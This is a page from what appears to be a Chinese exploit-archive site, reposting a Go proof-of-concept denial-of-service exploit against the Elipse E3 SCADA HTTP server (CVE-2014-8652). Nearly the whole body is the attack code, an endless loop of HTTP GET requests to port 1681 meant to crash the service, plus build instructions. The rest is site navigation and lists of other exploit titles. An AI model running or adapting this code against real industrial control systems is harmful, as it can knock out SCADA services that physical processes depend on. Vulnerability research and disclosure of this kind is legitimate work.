首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Elipse E3 HTTP Denial of Service
来源:mauro.risonho@gmail.com 作者:firebitsbr 发布时间:2014-11-27  
// Exploit Http DoS Request for SCADA ATTACK Elipse 3
// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho@gmail.com
// 29-10-2013 11:42
// Vendor Homepage: http://www.elipse.com.br/port/index.aspx
// Software Link: http://www.elipse.com.br/port/e3.aspx
// Version: 3.x and prior
// Tested on: windows
// CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8652
// NVD : https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8652
// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
// exploit in Golang (golang.com) C Google
// compile and execute:
// go build Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
// chmod +x Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
// ./Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
  
package main
  
import (
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
)
  
func main() {
    count := 1
//  fmt.Println ("")
//  fmt.Println ("   _____.__              ___.   .__  __           ")
//  fmt.Println (" _/ ____\__|______   ____\_ |__ |__|/  |_  ______ ")
//  fmt.Println (" \   __\|  \_  __ \_/ __ \| __ \|  \   __\/  ___/ ")
//  fmt.Println (" |  |  |  ||  | \/\  ___/| \_\ \  ||  |  \___ \  ")
//  fmt.Println (" |__|  |__||__|    \___  >___  /__||__| /____  > ")
//  fmt.Println ("                       \/    \/              \/  ")
//  fmt.Println ("                   bits on fire. ")
    fmt.Println ("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
    fmt.Println ("Mauro Risonho de Paula Assumpção aka firebits")
    fmt.Println ("29-10-2013 11:42")
    fmt.Println ("mauro.risonho@gmail.com")
    fmt.Println ("Hard lock Dll crash in Windows 2003 SP2 + ")
    fmt.Println ("20 requests connections per second")
  
    for {
        count += count
        //http://192.168.0.1:1681/index.html -> Elipse 3 http://<ip-elipse4><port listen: default 1681>
  
        fmt.Println ("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
        fmt.Println ("Mauro Risonho de Paula Assumpção aka firebits")
        fmt.Println ("29-10-2013 11:42")
        fmt.Println ("mauro.risonho@gmail.com")
        fmt.Println ("Hard lock Dll crash in Windows 2003 SP2 + ")
        fmt.Println ("20 requests connections")
  
        fmt.Println ("Connected Port 1681...Testing")
        fmt.Println ("Counter Loops: ", count)
  
        res, err := http.Get("http://192.168.0.1:1681/index.html")
        if err != nil {
            log.Fatal(err)
        }
            robots, err := ioutil.ReadAll(res.Body)
            res.Body.Close()
            if err != nil {
            log.Fatal(err)
        }
        fmt.Printf("%s", robots)
    }
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mini-stream RM-MP3 Converter 3
·Android WAPPushManager - SQL I
·Pandora FMS SQLi Remote Code E
·Device42 WAN Emulator 2.3 Trac
·Device42 WAN Emulator 2.3 Ping
·KMPlayer 3.9.1.130 Denial Of S
·Slider Revolution/Showbiz Pro
·PHP 5.x / Bash Shellshock Proo
·Android Settings Pendingintent
·Mozilla Firefox 3.6 mChannel U
·Android SMS Resend Vulnerabili
·All-in-One WP Migration 2.0.2
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved